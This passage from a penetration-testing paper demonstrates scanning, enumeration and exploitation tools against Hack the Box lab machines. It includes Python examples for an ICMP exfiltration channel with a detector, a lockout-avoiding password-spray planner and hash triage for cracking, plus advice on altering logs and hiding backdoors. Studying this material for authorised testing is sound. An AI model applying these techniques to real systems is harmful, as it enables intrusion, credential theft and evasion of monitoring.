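    """ICMP echo request: type 8, code 0, checksum, identifier, sequence, payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    chk = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, chk, ident, seq) + payload


def parse_echo(packet):
    """Return (type, ident, seq, payload); raises ValueError on a bad checksum."""
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, _, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]


def exfil_packets(data, ident=0x1337, chunk=32):
    """Client side: one echo request per chunk, sequence number = chunk index."""
    return [build_echo(ident, i, data[off:off + chunk])
            for i, off in enumerate(range(0, len(data), chunk))]


def reassemble(packets, ident=0x1337):
    """Server side: select our echo requests by identifier and reorder by sequence."""
    chunks = {}
    for packet in packets:
        icmp_type, pkt_ident, seq, payload = parse_echo(packet)
        if icmp_type == ICMP_ECHO_REQUEST and pkt_ident == ident:
            chunks[seq] = payload
    return b"".join(chunks[seq] for seq in sorted(chunks))


def looks_like_exfil(packet):
    """Detector: flag echo requests whose payload is not what a stock ping client sends."""
    icmp_type, _, _, payload = parse_echo(packet)
    if icmp_type != ICMP_ECHO_REQUEST:
        return False
    if payload == WINDOWS_PING_PAYLOAD:
        return False
    if len(payload) == 56 and payload[16:] == LINUX_PING_PATTERN:
        return False
    return True


# Constructed secret; delivered in reverse order below to show reassembly.
SECRET = b"board-minutes-q4.txt: acquisition target is Contoso, offer 40M, announce 12 Jan\n"


def run_demo():
    """Returns (recovered_bytes, exfil_packets_flagged, normal_ping_flagged)."""
    packets = exfil_packets(SECRET)
    recovered = reassemble(packets[::-1])
    normal_ping = build_echo(1, 1, WINDOWS_PING_PAYLOAD)
    flagged = sum(looks_like_exfil(p) for p in packets)
    return recovered, flagged, looks_like_exfil(normal_ping)


if __name__ == "__main__":
    recovered, flagged, normal_flagged = run_demo()
    print(recovered == SECRET, flagged, normal_flagged)
```

The secret survives the out-of-order delivery intact, every exfiltration packet is flagged, and neither the Windows nor the Linux ping payload is; a real detector would add rate and volume thresholds, since an attacker can copy the stock payload and encode data elsewhere (timing, identifier, sequence) at a much lower bandwidth.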
Log deletion and removal of installed software are part of covering the tracks left by a penetration test. Log deletion during the test is also part of maintaining stealth against IDS and IPS on the network (Allen & Cardwell, 2016, pp. 331-344). Cleaning up log files and modifying registry settings and values are both important when trying to avoid detection. Deleting a log file is more suspicious than modifying one, especially when the modification is performed with SYSTEM permissions on a Windows server or root permissions on a Linux device, so it is advisable to modify logs rather than delete them (Allen & Cardwell, 2016, pp. 331-344). Removing the software, programs, script files and applications used for testing is also an important step, because they could otherwise be used by malicious attackers to compromise the organization. Leaving the network clean and pristine once testing concludes shows the organization that the tester possesses professionalism and attention to detail. A common issue during post-test clean-up is remembering everything that needs to be removed or reconfigured. Keeping detailed records and logs of the test, including every piece of software, program, script file and application placed on target devices, assists in cleanup after testing has concluded and in writing the penetration test report for the organization (Allen & Cardwell, 2016, pp. 331-344).

Discussion of the Findings

The purpose of this research was to provide guidance on the steps for performing a penetration test using the most common open-source tools in the three main fields of penetration testing: wireless, web application and Intranet. This guidance is for those who possess a deep understanding of the technical aspects of IT, are passionate about cybersecurity, and want a starting framework they can use to develop their own penetration testing methodology.
To demonstrate the benefits of these tools, they need to be tested. In this section, the tools tested are Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and 10.10.10.157 run Linux; 10.10.10.169 is a Windows device.

Wireless Tool Benefits

The Aircrack-ng suite and Kismet are the two most commonly used toolsets for wireless penetration testing, given their wide range of capabilities and straightforward command-line interfaces. Aircrack-ng bundles multiple tools that perform different functions in wireless security testing, credential harvesting and endpoint compromise. Kismet is a wireless security tool known for its ability to assess the security protocols of wireless networks passively, without connecting to them, and for identifying networks and devices that do not use the IEEE 802.11 standard.

Web Application Testing Results

In web application security testing there are four main tools: OWASP's ZAP, Nikto, SQLMap, and Burp Suite. Each has its own capabilities and user interface. ZAP and Burp Suite use a graphical user interface (GUI), whereas Nikto and SQLMap are command-line tools. ZAP offers both automated and manual web application scanning, while Burp Suite is used mainly for manual testing as a proxy between the tester's browser and the web application. ZAP and Burp Suite cover web application security testing broadly, whereas SQLMap focuses on SQL injection vulnerabilities in the web application. These are the most commonly used web application testing tools, and penetration testers need to be familiar with them and how they function in order to be well-rounded testers.

The first tool tested for web application security was Nikto. The initial scan was run with the command ‘nikto -host 10.10.10.157’.
Nikto defaults to port 80 when no port is specified in the command. Port 80 had been found open in the Nmap scan run during discovery and enumeration, described in the next section. The results of the Nikto scan are shown in Figure 7.

Figure 7. Nikto Command and Output From a Generic Scan

Nikto reported that the Apache version is out of date and may contain vulnerabilities that the tester can research online. The scan also lists the HTTP methods the web application allows. An allowed POST method matters if the site has a login form, since that is where password spraying could take place.

ZAP testing revealed that the current Kali Linux release does not include ZAP by default, so it was installed with the command ‘apt-get install owasp-zap’. Once installation was complete, the command ‘owasp-zap’ started the program. From the home screen the automated scan was selected, where the target details were entered. See Figure 8 for a screenshot of the configuration page and Figure 9 for the results of the scan.

Figure 8. ZAP Automated Scan Configuration Screen
Note: This screenshot illustrates the input of variables into the scan configuration screen.

Figure 9. ZAP Automated Scan Results
Note: This figure illustrates the results of the scan and the tabbed options that show various other result information.

ZAP searches for known common URL paths and presents the findings, which can be sorted for convenience. In Figure 9 the ‘Reason’ column is sorted so that ‘OK’ responses appear at the top, meaning that the URL exists and returned content when requested. Much like Nikto, ZAP probes many URLs and other criteria and presents the results.

Intranet Security Testing Results

The tools for intranet testing depend on the stage of the test the penetration tester is working in.
The stages of a penetration test are discovery, enumeration, exploitation, privilege escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014, pp. 60-66). Each stage has a set of tools best suited to what the analyst is trying to accomplish. Nmap is the most recommended tool for discovery scanning and service enumeration. Nmap has been around since 1997 and has been improved over the years so that it performs a wide range of functions. Its syntax is straightforward and there is no shortage of resources that can guide a new penetration tester to the best scan for the environment under test. Between live host discovery, port scanning, service version detection, OS fingerprinting, the built-in Nmap Scripting Engine (NSE) scripts and the ability to write new ones, there are few scanning operations this tool cannot perform (Lyon, 2008).

When testing Nmap, a tester must scan the devices on a network. The first command run was ‘nmap -v -p- 10.10.10.157 -oG 157portscan.txt’. This scans all 65,535 TCP ports on the device and writes the results in grepable format to the file 157portscan.txt. Once Nmap displayed the open ports, a second scan was run against them that identifies service versions, fingerprints the OS and runs the default NSE scripts. See Figure 10 for the Nmap command and its results.

Figure 10. Nmap device enumeration command
Note: This figure illustrates the command switches that identify the service version of the listed ports and the operating system.

As shown in Figure 10, the Apache web server on port 80 is version 2.4.29. This is an older release, and a penetration tester can research that version of Apache for known vulnerabilities. OpenVAS is also a well-known scanning tool used specifically for vulnerability detection and exploit recommendations. It can perform automated scanning and displays vulnerability information for each finding.
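The two-stage Nmap workflow described above (a full port sweep saved in grepable format, then a targeted version, script and OS scan of only the open ports) can be scripted. The following is an added example written for this page, not code from the paper or from the Nmap project. The grepable text it parses is a constructed sample modeled on the real -oG layout, not the actual output for 10.10.10.157, and the second-stage switches -sV -sC -O -oA are this example's choice of follow-up scan.

```python
"""Parse Nmap grepable output (-oG) and build the follow-up scan command.

Added example, not code from the paper or from Nmap. The sample -oG text
below is constructed to resemble what the full-port scan in the text
writes; it is not the real output for 10.10.10.157.
"""
import re
import shlex

# Constructed sample of a file written by `nmap -v -p- <host> -oG <file>`.
# Real files have a "# Nmap ... scan initiated" header, one "Host:" line
# per target (plus a separate "Status:" line) and a "# Nmap done" footer.
SAMPLE_OG = """\
# Nmap 7.80 scan initiated Sun Nov 10 12:00:00 2019 as: nmap -v -p- -oG 157portscan.txt 10.10.10.157
Host: 10.10.10.157 ()\tStatus: Up
Host: 10.10.10.157 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/filtered/tcp//mysql///\tIgnored State: closed (65532)
# Nmap done at Sun Nov 10 12:05:00 2019 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# One port entry is port/state/protocol/owner/service/rpcinfo/version/ ;
# the owner, rpcinfo and version fields are usually empty in a plain port
# scan but are filled in by -sV, so they are matched as [^/]* here.
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/[^/]*/")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service), ...]} from -oG text.

    Only "Host:" lines carrying a "Ports:" field are used; comment lines
    and the bare "Status: Up" line are skipped.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = [(int(p), st, pr, svc) for p, st, pr, svc in PORT_RE.findall(ports_field)]
        results.setdefault(host, []).extend(entries)
    return results


def open_ports(parsed, host):
    """Open ports for a host, sorted; filtered and closed ports are dropped."""
    return sorted(p for p, state, _proto, _svc in parsed.get(host, []) if state == "open")


def version_scan_command(parsed, host, output_prefix):
    """Build the second-stage command: service versions (-sV), default NSE
    scripts (-sC) and OS detection (-O) against only the open ports, with
    every output format written under output_prefix (-oA).
    Returns None when nothing is open, so no pointless scan is launched."""
    ports = open_ports(parsed, host)
    if not ports:
        return None
    args = ["nmap", "-sV", "-sC", "-O", "-p", ",".join(map(str, ports)), "-oA", output_prefix, host]
    return " ".join(shlex.quote(a) for a in args)


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_OG)
    print(open_ports(parsed, "10.10.10.157"))
    print(version_scan_command(parsed, "10.10.10.157", "157enum"))
```

Feeding only the open ports into the second scan keeps the noisier -sV and NSE probes off the 65,000-odd closed ports, which is both faster and quieter on a monitored network.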
OpenVAS output is more detailed than Nmap's, which displays raw information that the tester must research to determine whether vulnerabilities exist. When enumerating with Nmap, success comes down to the penetration tester's familiarity with known vulnerabilities in particular service versions and their understanding of how those services operate on different ports. In this example, OpenVAS was installed with the command ‘apt-get install openvas’. Once installed, it is set up with the command ‘openvas-setup’. After setup completes, the login username and password appear at the bottom of the terminal output, and the web user interface (UI) was loaded at the URL shown there. Since the login information is provided during setup, logging in to the web UI is straightforward. To start a scan, click the Scans tab at the top of the page, choose Tasks from the drop-down menu, and then click the purple wizard icon at the top left, which opens the task wizard (see Figure 11 for a screenshot).

Figure 11. How to Start a Scan in OpenVAS
Note: This illustrates the icons to click to start a scan in OpenVAS.

At the bottom of Figure 11, the scan status is shown and the page is set to refresh every 30 seconds. This begins the OpenVAS vulnerability scan of 10.10.10.157. When the scan finished, its status changed from ‘Requested’ to ‘Done’, which allows the user to view the vulnerability results as shown in Figure 12. The vulnerabilities let a tester determine what offensive actions can be taken to compromise the system.

Figure 12. Results From OpenVAS Scan
Note: This illustrates the list of vulnerabilities found by the scan of 10.10.10.157 in OpenVAS.

For enumeration, enum4linux is a reputable resource. Discovery scanning showed that 10.10.10.169 has the Lightweight Directory Access Protocol (LDAP) running, which identifies it as an Active Directory domain controller; LDAP is the directory protocol through which Windows domain clients look up users, groups and policy. enum4linux itself gathers its information over SMB and MSRPC (typically through a null session) rather than LDAP, but against a domain controller the users, groups and policy it returns are the domain's Active Directory objects.
Running enum4linux with no credentials and the -a option, giving the command ‘enum4linux -a 10.10.10.169’, returned valuable data. The most important data was the list of users in the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.

Figure 13. Enum4linux LDAP Output
Note: This lists the user accounts found in the Active Directory group ‘Domain Users’ during the enumeration of 10.10.10.169 using enum4linux.

In addition to the members of ‘Domain Users’, the output listed every user in the domain. See Figure 14 for the screenshot of all users. The tool also returned the password policy for the domain ‘megabank’, which is the server's domain. See Figure 15 for the password policy screenshot.

Figure 14. Enum4linux Users Output
Note: This screenshot lists all the user accounts found on 10.10.10.169 during enumeration.

Figure 15. Enum4linux Password Policy Output
Note: This figure shows that the domain password policy appears in the output of enum4linux enumeration.

Enum4linux is a useful tool that provides valuable information when used correctly. The password policy in particular (minimum length, lockout threshold and lockout observation window) tells the tester how many guesses per account can be attempted against the user list before accounts lock, which is what makes a password-spraying attempt safe to plan. Once the target is known and enumerated, exploitation and gaining access to the machines are the next steps. For exploitation, Metasploit is second to none. Metasploit is the most commonly used exploitation tool, as it has pre-built exploit modules designed for specific vulnerabilities. This allows for exploit automation and lets a less experienced penetration tester exploit vulnerabilities they would otherwise lack the technical capability to exploit. The framework also includes modules for scanning, enumeration, exploitation and post-exploitation. Post-exploitation and persistence are what allow a penetration tester to continue a test after initial exploitation and access to a machine.
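Before moving on to exploitation, here is how the two pieces of enum4linux output discussed above, the user list and the domain password policy, are turned into a password-spray schedule that stays under the lockout threshold. This is an added example written for this page, not code from the paper or from enum4linux. The enum4linux text it parses is constructed to follow the tool's output layout; the domain, user names, RIDs and policy values are made up and are not those of 10.10.10.169. The safety margin of two attempts below the threshold is this example's own choice.

```python
"""Turn enum4linux output (domain password policy plus the user list)
into a lockout-safe password-spray schedule.

Added example, not code from the paper or from enum4linux. The text
below is constructed to follow enum4linux's output layout; the domain,
user names, RIDs and policy values are made up, not those of
10.10.10.169.
"""
import re

SAMPLE_ENUM4LINUX = """\
[+] Password Info for Domain: MEGABANK

\t[+] Minimum password length: 7
\t[+] Password history length: 24
\t[+] Maximum password age: 41 days 23 hours 53 minutes
\t[+] Password Complexity Flags: 000000

\t[+] Minimum password age: 1 day 4 minutes
\t[+] Reset Account Lockout Counter: 30 minutes
\t[+] Locked Account Duration: 30 minutes
\t[+] Account Lockout Threshold: 5
\t[+] Forced Log off Time: Not Set

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[alice] rid:[0x457]
user:[bob] rid:[0x458]
"""

# enum4linux label -> key used here; only the fields that matter for
# spraying are kept.
POLICY_FIELDS = {
    "Minimum password length": "min_length",
    "Account Lockout Threshold": "lockout_threshold",
    "Reset Account Lockout Counter": "lockout_window_min",
    "Locked Account Duration": "lockout_duration_min",
}
POLICY_RE = re.compile(r"\[\+\]\s+([A-Za-z ]+?):\s*(.+?)\s*$")
USER_RE = re.compile(r"user:\[([^\]]+)\]\s+rid:\[0x([0-9a-fA-F]+)\]")
SKIP_RIDS = {0x1f5, 0x1f6}  # Guest and krbtgt: never worth a guess


def to_minutes(value):
    """'30 minutes' or '1 day 4 minutes' -> minutes; 'Not Set'/'None' -> None."""
    total, found = 0, False
    for n, unit in re.findall(r"(\d+)\s*(day|hour|minute)", value):
        found = True
        total += int(n) * {"day": 1440, "hour": 60, "minute": 1}[unit]
    return total if found else None


def parse_enum4linux(text):
    """Return (policy dict, [user names]) from enum4linux -a output."""
    policy, users = {}, []
    for line in text.splitlines():
        m = POLICY_RE.search(line)
        if m and m.group(1) in POLICY_FIELDS:
            key, raw = POLICY_FIELDS[m.group(1)], m.group(2)
            if key in ("min_length", "lockout_threshold"):
                # enum4linux prints "None" when account lockout is disabled
                policy[key] = int(raw) if raw.isdigit() else None
            else:
                policy[key] = to_minutes(raw)
            continue
        u = USER_RE.search(line)
        if u and int(u.group(2), 16) not in SKIP_RIDS:
            users.append(u.group(1))
    return policy, users


def spray_plan(policy, passwords, margin=2):
    """Schedule spray rounds: each round tries ONE password against every
    user, and no account receives more than (threshold - margin) failed
    attempts inside one lockout observation window.

    Returns [(start_minute, password), ...]. Rounds sharing a start minute
    run back to back; the next group waits for the window to elapse so the
    bad-password counter has reset. A threshold of None means lockout is
    disabled. The margin of 2 is this example's own safety choice."""
    min_len = policy.get("min_length") or 0
    passwords = [p for p in passwords if len(p) >= min_len]  # policy would reject shorter ones
    threshold = policy.get("lockout_threshold")
    window = policy.get("lockout_window_min") or 0
    per_window = len(passwords) if threshold is None else max(threshold - margin, 1)
    plan, minute = [], 0
    for i, pw in enumerate(passwords):
        if i and i % per_window == 0:
            minute += window + 1  # give the counter a full window plus slack to reset
        plan.append((minute, pw))
    return plan


if __name__ == "__main__":
    policy, users = parse_enum4linux(SAMPLE_ENUM4LINUX)
    print(policy, users)
    for start, pw in spray_plan(policy, ["Winter2019!", "Summer2019!", "Password1", "Welcome1"]):
        print(f"t+{start:>3} min: try {pw!r} against {len(users)} users")
```

With a threshold of 5 and a 30-minute reset window, the plan above runs three passwords back to back and then waits 31 minutes before the fourth, so no account ever reaches the lockout count. The same parser also tells the tester when the threshold is ‘None’, in which case the only limit is how much noise the test is allowed to make.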
Post-exploitation includes privilege escalation, lateral movement to other machines across the intranet, monitoring and logging on devices, and the creation of backdoors for future access. Because of the multitude of tasks involved, there are tools designed to assist with each specific task, and the choice can depend on the OS of the compromised machine. Obtaining and using passwords found on a machine is one way to gain access while blending in with legitimate activity on the network. Valid credentials make remote access to a machine easier, for example for installing backdoors, and they also let the penetration tester browse file shares and read the Security Account Manager (SAM) database without arousing suspicion. This is a very important step in the penetration testing methodology for initially obtaining and then maintaining access. A domain user account provides access to whichever computers and file shares that user is authorized for, which is useful for spreading across the network. A domain administrator account provides far more: administrative permissions on all of the servers and workstations in the organization's domain.

Netcat can be used as a backdoor and for data exfiltration. Metasploit's Meterpreter is also used for creating and maintaining a backdoor on a machine. Meterpreter gains stealth by running entirely in memory inside a host process and by being able to migrate into another legitimate process, from which it launches hidden Windows command shells to execute commands remotely; because nothing needs to be written to disk, this is one way of bypassing signature-based anti-virus (AV) and IDS. Meterpreter's Smart Hashdump post-exploitation module (post/windows/gather/smart_hashdump) dumps the local account password hashes from the SAM for offline cracking; it does not capture memory. Dumping a host's volatile memory for analysis is a separate task, for which free Windows tools such as Belkasoft RAM Capturer and Mandiant Memoryze exist.
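What the Smart Hashdump output looks like, and what a tester checks in it before handing it to John the Ripper or hashcat, is shown in the following added example. It is written for this page and is not code from the paper or from Metasploit. The hashdump lines are constructed: the account names are made up, the non-empty hashes are the widely published test-vector hashes of the string ‘password’, and the other values are the well-known hashes of an empty password; none of it is a real dump from 10.10.10.169.

```python
"""Triage a Windows hashdump (pwdump-style lines, the format written by
Meterpreter's hashdump and smart_hashdump modules) before cracking.

Added example, not code from the paper or from Metasploit. The sample
lines are constructed: names are made up, the hashes are either the
well-known empty-password values or the published test-vector hashes
of the string "password", not a real dump from any target.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (blank password)

# Constructed sample. Field order is user:RID:LM hash:NT hash:::
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy_app:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_hashdump(text):
    """Return [{user, rid, lm, nt}, ...]; lines not in pwdump layout are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def triage(entries):
    """Findings worth reporting before any GPU time is spent:
    - blank_password: accounts whose NT hash is the empty-string hash
    - shared_password: one NT hash used by several accounts (password reuse)
    - lm_hash_present: accounts still stored in the weak LM format
    """
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "shared_password": {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
    }


def cracking_inputs(entries):
    """Lines for John (--format=NT accepts user:hash) and for hashcat -m 1000
    (bare NT hashes, deduplicated so each distinct password is attacked once).
    Blank passwords are dropped: they need no cracking."""
    john = [f"{e['user']}:{e['nt']}" for e in entries if e["nt"] != EMPTY_NT]
    hashcat = sorted({e["nt"] for e in entries if e["nt"] != EMPTY_NT})
    return john, hashcat


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    print(triage(entries))
    john, hashcat = cracking_inputs(entries)
    print("\n".join(john))
    print(hashcat)
```

Deduplicating by NT hash matters on large dumps: cracking one hash that three accounts share recovers all three passwords, and a non-empty LM hash is the first thing to attack because LM is case-insensitive and split into two 7-character halves.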
Lastly, the Data Exfiltration Toolkit (DET) is made specifically for exfiltrating data discreetly and was designed for data loss prevention (DLP) testing.

Remaining undetected is critical for a penetration tester, and each tool has functions that assist with obfuscation and stealth. Tools alone are not enough to remain undetected. A penetration tester must apply knowledge of networking and of OS operation and configuration to stay hidden from IDS/IPS. Creating legitimate-looking local and AD accounts for persistence reduces the likelihood that later activity will be flagged as suspicious by a security information and event management (SIEM) system or by user behavior analytics (UBA); every such account must be recorded so that it can be removed at the end of the test. After the penetration test completes, it is important to remove anything left on the organization's network and systems that has not been removed already. This includes deleting any accounts created, resetting any permissions and registry keys modified, and removing any software, files or folders placed on devices. Cleaning up and removing anything that a real attacker could use in the future is part of the penetration testing process and should never be skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the organization by highlighting security weaknesses and thereby improving its security posture. An analysis or test that leaves the organization at greater risk than before is a failure of that test and of the testers.

Commonalities

Several commonalities were found between the different penetration testing sections and toolsets. According to the Literature Review, the first step in any penetration test is intelligence gathering, regardless of which part of an organization is being tested. Knowing as much as possible about the organization's operations, people, and threat vectors is necessary for a strong start to a penetration test.
OSINT is the practice of gathering information from open sources and platforms, such as social media and search engines. Social engineering is one of the main reasons for performing OSINT, as personal details about staff help craft a social engineering attack with the highest chance of obtaining sensitive information. A penetration tester can compromise an organization by tricking one of its employees into opening a malicious attachment containing custom malware. This can compromise the machine and give the penetration tester credentials that can be used in other parts of the test, such as wireless or intranet testing.

Another commonality was the tools shared across testing fields. In both wireless network security testing and intranet security testing, decryption or hash cracking was required for various reasons. John the Ripper (JTR) was suggested for hash cracking in both wireless and wired network security testing, as it can attack both password hashes and the captured handshakes of wireless security protocols. JTR was also suggested for cracking the hashes of Windows credentials taken from a compromised machine. There are also areas where testing fields become sub-tasks of one another. For example, web applications may be discovered during an intranet penetration test. Organizations often use web portals for corporate tool and resource logins, such as SolarWinds' Orion network management platform. Orion can serve as an organization's IP address management (IPAM) resource, which would let the tester see what each subnet of the company's intranet is used for, and even which devices hold which IP addresses within those networks.
This would allow the tester to focus on high-value targets such as the domain controller (DC), the domain name system (DNS) servers, database servers and others.

One toolset that bridges wireless security testing and endpoint compromise is Aircrack-ng. The suite supports man-in-the-middle attacks, such as a rogue access point, that can either compromise a workstation or capture credentials from the user. Credentials phished from a user through a fake wireless logon page can be used during intranet security testing when the penetration tester wants to escalate privileges or move laterally across the network. Web application, wireless and intranet testing merge when a compromised web application yields credentials for a wireless network, from which intranet testing can begin. Compromising Internet-facing web applications can also give access to the web server itself, which in turn may provide access to an internal network, depending on how the organization has networked its web servers. Many variables determine the path an analyst takes during a penetration test, and there are several points where wireless, web application, and intranet testing intersect during a fully scoped engagement.

Having a good toolset, along with in-depth knowledge of those tools, gives a penetration tester the ability to perform the test successfully. For wireless testing, Kismet and the Aircrack-ng suite are the tools that provide the best results. ZAP, Nikto, SQLMap and Burp Suite are the best tools for testing web application security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools that provide the best results during the first five stages of an intranet penetration test. Keeping detailed records and logs of the test is the best practice for successfully completing the final two stages.
Conclusion

A lack of advanced knowledge of and experience with cybersecurity technologies and concepts is the main factor keeping information technology professionals out of the cybersecurity industry. Knowledge of advanced IT functions and familiarity with cybersecurity processes and technologies are required to begin a career in cybersecurity. Knowing where to begin can be difficult, and there are many separate but useful sources of information about cybersecurity processes and technologies. Few sources have combined that information into a penetration testing template with tool usage and syntax for performing a test.

There is no shortage of tools available for security and penetration testing. Many tools have enough functionality, but not all are user-friendly or cover a wide range of functions. Some tools are designed to test one aspect of an environment, such as wireless networks or SQL. Others perform multiple functions, such as Nmap, which handles network discovery and enumeration, or Metasploit, which can be used at every stage of the penetration testing process. Some tools are more commonly used and more popular than others because they are more effective, so it is beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and syntax of each of them. Not all tools are run from the command line, but familiarity with each tool's capabilities and operation is required for effectiveness.

Understanding a tool's capabilities and operation is only part of a penetration test. An analyst must also know the penetration testing process through standards and authoritative sources.
The Penetration Testing Execution Standard is a guide that can help a new tester with the methodology and mindset required to perform a thorough and successful test and analysis of an organization's information systems security. The ability to be inquisitive, read logs and follow leads are a penetration tester's personal strengths and skills outside of the toolset. Security analysis and testing is a job for those who have a passion for cybersecurity work. The ability to think outside the box is required when searching for vulnerabilities that no one else has yet found. The tester's tools are their arsenal, which lets them apply their knowledge, inquisitiveness, and passion to an analysis and penetration test.

There will always be new technologies in use by organizations around the world, and technology will always evolve. A pentester must constantly learn about new technologies and be ready to analyze and test those devices, programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an understanding of the toolsets will start a career in cybersecurity. Continuous education is the key to sustaining it.

References

Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of Supercomputing.
Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration Testing. Birmingham, UK: Packt Publishing.
Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay, Tasmania, Australia: International Journal of Grid and Distributed Computing.
Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK: Packt Publishing.
Andress, J., & Winterfeld, S. (2014). Cyber Warfare: Techniques, Tactics and Tools for Security Practitioners. Waltham: Syngress.
Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks Tech Docs.
, B. (2015). New Media Politics: Rethinking Activism and National Security in Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.
Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (2nd ed.). Birmingham, UK: Packt Publishing.
Bejtlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident Detection and Response. San Francisco, California, United States: No Starch Press.
Broad, J., & Bindner, A. (2014). Hacking with Kali: Practical Penetration Testing Techniques. Waltham: Syngress.
Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features. Amsterdam, Netherlands: Digital Press.
Condon, C. (2019). Metasploit Framework. Retrieved from GitHub.
, W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia: Center for Strategic & International Studies.
Data Science Team. (2017). Introduction to Artificial Intelligence for Security Professionals. Irvine: The Cylance Press.
Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical and Computer Engineering. Retrieved from Directory of Open Access Journals.
EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data Servers (2nd ed.). Boston, MA: Cengage Learning.
EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (2nd ed.). Boston: Cengage Learning.
Engebretson, P. (2013). The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy. Waltham: Syngress.
Fadyushin, V., & Popov, A. (2016). Building a Pentesting Lab for Wireless Networks. Birmingham, UK: Packt Publishing.
Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student Organization.
, M., & Watkins, S. (2006). Hack the Stack: Using Snort and Ethereal to Master the 8 Layers of an Insecure Network. Rockland, MA, United States: Syngress.
Hack the Box. (2019). About. Retrieved from Hack the Box.
, W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham, UK: Packt Publishing.
IBM. (2019). Data Breach. Retrieved from IBM Security.
Identity Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved from ID Theft Center.
IEEE. (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association.
Information Systems Security Certification Consortium. (2018). Cybersecurity Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved from ISC2.
, A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments. Birmingham, UK: Packt Publishing.
Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box Testing Techniques. Sikkim: International Journal of Advanced Computer Science and Applications.
Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers. Retrieved from ProQuest.
Lyon, G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: Insecure.Com LLC.
Merriam-Webster. (2019). Internet. Retrieved from Merriam-Webster.
, S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo Park: Herjavec Group.
Portcullis Labs. (2017). enum4linux. Retrieved from Portcullis Labs.
, G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (3rd ed.). Birmingham, UK: Packt Publishing.
NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center.
NIST. (2019). Red Team. Retrieved from Computer Security Resource Center.
Offensive Security. (2019). Why Offensive Security. Retrieved from Offensive-Security.
OWASP. (2019). Penetration Testing Methodologies. Retrieved from OWASP.
, R. (2013). Kali Linux Social Engineering: Effectively Perform Efficient and Organized Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK: Packt Publishing.
Pauli, J. (2013). The Basics of Web Hacking: Tools and Techniques to Attack the Web. Amsterdam, Netherlands: Syngress.
PCI Security Standards. (2019). Responding to a Data Breach. Retrieved from PCI Security Standards.
